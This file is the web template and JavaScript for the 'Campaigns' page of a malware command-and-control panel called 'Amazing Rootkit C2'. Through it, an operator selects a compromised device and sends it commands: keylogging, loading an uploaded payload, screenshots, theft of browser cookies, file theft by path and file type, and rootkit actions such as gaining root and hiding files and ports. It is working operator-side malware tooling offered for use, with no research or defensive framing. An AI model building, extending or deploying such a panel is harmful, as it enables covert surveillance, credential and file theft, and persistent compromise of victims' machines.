<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>C2 Campaigns</title>
    <!-- Bootstrap CSS -->
    <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" rel="stylesheet">
    <!-- FontAwesome -->
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css" rel="stylesheet">
    <!-- Chart.js -->
    <script src="https://cdn.jsdelivr.net/npm/chart.js"></script>
    <!-- Google Fonts -->
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap" rel="stylesheet">
    <!-- Custom CSS -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-KK94CHFLLe+nY2dmCWGMq91rCGa5gtU4mk92HdvYe+M/SXH301p5ILy+dN9+nJOZ" crossorigin="anonymous">
    <link rel="stylesheet" href="{{ url_for('static', filename='styles.css') }}">
</head>
<body>
    <div class="container-fluid">
        <div class="row">
            <!-- Sidebar -->
            <nav class="col-md-2 d-md-block bg-dark sidebar sidebar-dark accordion">
                <div class="sidebar-brand d-flex align-items-center justify-content-center">
                    <div class="sidebar-brand-icon">
                        <i class="fas fa-user-secret"></i>
                    </div>
                    <div class="sidebar-brand-text mx-3"><strong>Amazing Rootkit<sup> C2</sup></strong></div>
                </div>
                <hr class="sidebar-divider my-0">
                <!-- Sidebar Menu -->
                <ul class="navbar-nav" id="accordionSidebar">
                    <li class="nav-item active">
                        <a class="nav-link" href="dashboard">
                            <i class="fas fa-fw fa-tachometer-alt"></i>
                            <span>Dashboard</span>
                        </a>
                    </li>
                    <hr class="sidebar-divider">
                    <div class="sidebar-heading"><strong>Interface</strong></div>
                    <li class="nav-item">
                        <a class="nav-link collapsed" href="#" id="campaigns-toggle">
                            <i class="fas fa-fw fa-cog"></i>
                            <span>Campaigns</span>
                        </a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link collapsed" href="management">
                            <i class="fas fa-fw fa-wrench"></i>
                            <span>Management</span>
                        </a>
                    </li>
                    <hr class="sidebar-divider">
                    <div class="sidebar-heading"><strong>Addons</strong></div>
                    <li class="nav-item">
                        <a class="nav-link collapsed" href="info">
                            <i class="fas fa-fw fa-folder"></i>
                            <span>Info</span>
                        </a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link" href="lastActivity">
                            <i class="fas fa-fw fa-clock"></i>
                            <span>Last Activity</span>
                        </a>
                    </li>
                    <hr class="sidebar-divider d-none d-md-block">
                    <!-- Logout Button -->
                    <li class="nav-item mt-auto">
                        <a class="nav-link" id="logout" href="login">
                            <i class="fas fa-sign-out-alt"></i>
                            <span>Logout</span>
                        </a>
                    </li>
                </ul>
            </nav>
            <!-- Main Content -->
            <main role="main" class="col-md-9 ml-sm-auto col-lg-10 px-4">
                <div class="d-sm-flex align-items-center justify-content-between mb-4">
                    <h1 class="h3 mb-0 text-light"><strong>Campaigns</strong></h1>
                </div>

                <!-- Choose Device Form -->
                <div id="choose-device" class="card campaign-card bg-dark text-light mt-4">
                    <div class="card-body">
                        <h4 class="card-title"><strong>Select a Device...</strong></h4>
                        <form id="campaign-form">
                            <div class="form-group">
                                <select id="campaign" name="campaign" class="form-control" required>
                                    <option value="">Select a device</option>
                                    {% for device in devices %}
                                        <option value="{{ device }}">{{ device }}</option>
                                    {% endfor %}
                                </select>
                                <div class="invalid-tooltip">
                                    Please select a device from the list.
                                </div>
                            </div>
                            <button type="button" class="btn btn-primary btn-block" id="show-command-form">Submit</button>
                        </form>
                    </div>
                </div>

                <!-- Command Form -->
                <div id="command-form" class="card bg-dark text-light mt-4" style="display:none;max-width: 600px; margin: 0 auto;">
                    <div class="card-body">
                        <h2 class="card-title">Send Command</h2>
                        <form id="send-command-form">
                            <div class="form-group">
                                <select id="command-select" name="command" class="form-control" required>
                                    <option value="">Select ...</option>
                                    <option value="keylogger">Keylogger</option>
                                    <option value="loader">Loader</option>
                                    <option value="screenshot">Screenshot Feature</option>
                                    <option value="cookies">Browsers’ Cookies Theft</option>
                                    <option value="file_theft">File Theft Feature</option>
                                    <option value="rootkit">Rootkit</option>
                                </select>
                            </div>

                            <!-- Loader Options -->
                            <div id="loader-options" style="display:none;">
                                <div class="form-group">
                                    <label for="loader-file">Upload File:</label>
                                    <input type="file" id="loader-file" name="loader-file" class="form-control-file">
                                </div>
                            </div>

                            <!-- File-theft Options -->
                            <div id="file-theft-options" style="display:none;">
                                <div class="form-group">
                                    <label for="file-types">File Types (comma separated, e.g., *.jpg, *.txt):</label>
                                    <input type="text" id="file-types" name="file-types" class="form-control">
                                    <label for="file-path">File Path:</label>
                                    <input type="text" id="file-path" name="file-path" class="form-control" pattern="^/.*" placeholder="/path/to/files">
                                </div>
                                <button type="button" class="btn btn-secondary btn-sm save-task-btn" id="save-task">Save Task</button>
                            </div>

                            <!-- Rootkit Options -->
                            <div id="rootkit-options" style="display:none;">
                                <div class="form-group">
                                    <label for="rootkit-command">Rootkit Command:</label>
                                    <select id="rootkit-command" name="rootkit-command" class="form-control" required>
                                        <option value="0">ROOT_ME</option>
                                        <option value="1">ARB_ROOT</option>
                                        <option value="2">HIDE_FILE</option>
                                        <option value="3">HIDE_PORT</option>
                                    </select>
                                </div>
                                <div class="form-group" id="rootkit-value-group" style="display:none;">
                                    <label for="rootkit-value">Value:</label>
                                    <input type="text" id="rootkit-value" name="rootkit-value" class="form-control">
                                </div>
                            </div>

                            <button type="submit" class="btn btn-primary btn-block">Send Command</button>
                        </form>
                    </div>
                </div>

                <!-- Results Display -->
                <div id="results" class="card bg-dark text-light mt-4" style="display:none;">
                    <div class="card-body">
                        <h2 class="card-title">Results</h2>
                        <pre id="results-content" class="results-container bg-secondary text-light p-3 rounded"></pre>
                    </div>
                </div>

            </main>
        </div>
    </div>

    <script>
document.addEventListener('DOMContentLoaded', function() {
    let fileTheftTasks = {};
    let loaderFileName = '';
    let rootkitCommand = ''; // Variable to store the rootkit command
    let rootkitValue = ''; // Variable to store the rootkit value

    // Show command form when device is selected
    document.getElementById('show-command-form').addEventListener('click', function() {
        document.getElementById('choose-device').style.display = 'none';
        document.getElementById('command-form').style.display = 'block';
    });

    // Toggle visibility of options based on selected command
    document.getElementById('command-select').addEventListener('change', function() {
        const selectedCommand = this.value;
        document.getElementById('loader-options').style.display = selectedCommand === 'loader' ? 'block' : 'none';
        document.getElementById('file-theft-options').style.display = selectedCommand === 'file_theft' ? 'block' : 'none';
        document.getElementById('rootkit-options').style.display = selectedCommand === 'rootkit' ? 'block' : 'none';
    });

    // Handle file selection for loader command
    document.getElementById('loader-file').addEventListener('change', function() {
        const file = this.files[0];
        if (file) {
            loaderFileName = file.name;
        } else {
            loaderFileName = ''; // Clear the file name if no file is selected
        }
    });

    
    // Handle saving of file theft tasks
    document.getElementById('save-task').addEventListener('click', function() {
        const fileTypesInput = document.getElementById('file-types').value;
        const filePath = document.getElementById('file-path').value;

        if (fileTypesInput && filePath.startsWith('/')) {
            // Use the raw input directly without sanitization
            const timestamp = Date.now().toString(); // Get the current timestamp as a string
            const taskId = parseInt(timestamp.slice(-4), 10); // Extract the last 4 digits and convert to a number

            fileTheftTasks[taskId] = {
                start_path: filePath,
                files: fileTypesInput.split(',').map(type => type.trim())
            };

            document.getElementById('file-types').value = '';
            document.getElementById('file-path').value = '';
            alert('Task saved. You can add more tasks.');
        } else {
            alert('Please provide valid file types and file path.');
        }
    });

    // Handle form submission and confirmation
    document.getElementById('send-command-form').addEventListener('submit', function(event) {
        event.preventDefault();

        const commandValue = document.getElementById('command-select').value;
        const device = document.getElementById('campaign').value;
        let requestData = { Cmd: commandValue };

        if (commandValue === 'file_theft') {
            if (Object.keys(fileTheftTasks).length === 0) {
                alert('Please save at least one file theft task before sending the command.');
                return;
            }
            requestData.tasks = fileTheftTasks;
        } else if (commandValue === 'loader') {
            const loaderFile = document.getElementById('loader-file').files[0];
            if (!loaderFile) {
                alert('Please upload a file.');
                return;
            }

            const reader = new FileReader();
            reader.onload = function(event) {
                const arrayBuffer = event.target.result;
                const byteArray = new Uint8Array(arrayBuffer);

                // Convert the byte array to hex string
                const fileContentHex = Array.from(byteArray, byte => byte.toString(16).padStart(2, '0')).join('');

                requestData.file_content = fileContentHex;
                requestData.file_name = loaderFileName;

                // Send the request after reading the file
                sendCommand(device, requestData);
            };

            reader.readAsArrayBuffer(loaderFile); // Read the file as an ArrayBuffer for hex conversion
            return; // Exit early to wait for file reading
        } else if (commandValue === 'rootkit') {
             const rootkitId = document.getElementById('rootkit-command').value;
             const rootkitValue = document.getElementById('rootkit-value').value;
             requestData.id = rootkitId;
             requestData.value = rootkitValue;
        }

        sendCommand(device, requestData);
    });

    // Show or hide the rootkit value input based on selected rootkit command
    document.getElementById('rootkit-command').addEventListener('change', function() {
        const selectedCommand = this.value;
        const rootkitValueGroup = document.getElementById('rootkit-value-group');

        if (['1', '2', '3'].includes(selectedCommand)) {
            rootkitValueGroup.style.display = 'block';
        } else {
            rootkitValueGroup.style.display = 'none';
        }
    });

    function sendCommand(device, requestData) {
        // Ask for confirmation
        if (confirm('Would you like to overwrite previous actions and create a new one?')) {
            requestData.restart = 1;
        } else {
            requestData.restart = 0;
        }

        document.getElementById('command-form').style.display = 'none';
        document.getElementById('results').style.display = 'block';
        document.getElementById('results-content').textContent = `Command sent successfully. You can track the operation status for ${requestData.Cmd} on ${device} at tracking actions in the last activity tab.`;

        fetch(`/${device}/add_command/`, {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify(requestData)
        })
        .then(response => response.json())
        .then(data => {
            if (data.status === 'success') {
                console.log('Command sent successfully.');
            } else {
                document.getElementById('results-content').textContent = 'Something went wrong .. :( \nplease check your connection and try again.';
            }
        })
        .catch(error => {
            console.error('Error:', error);
            document.getElementById('results-content').textContent = 'Something went wrong .. :( \nplease check your connection and try again.';
        });
    }
});
    </script>

    <!-- JavaScript Libraries -->
    <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
    <!-- Custom JavaScript -->
    <script src="{{ url_for('static', filename='scripts.js') }}"></script>
</body>
</html>
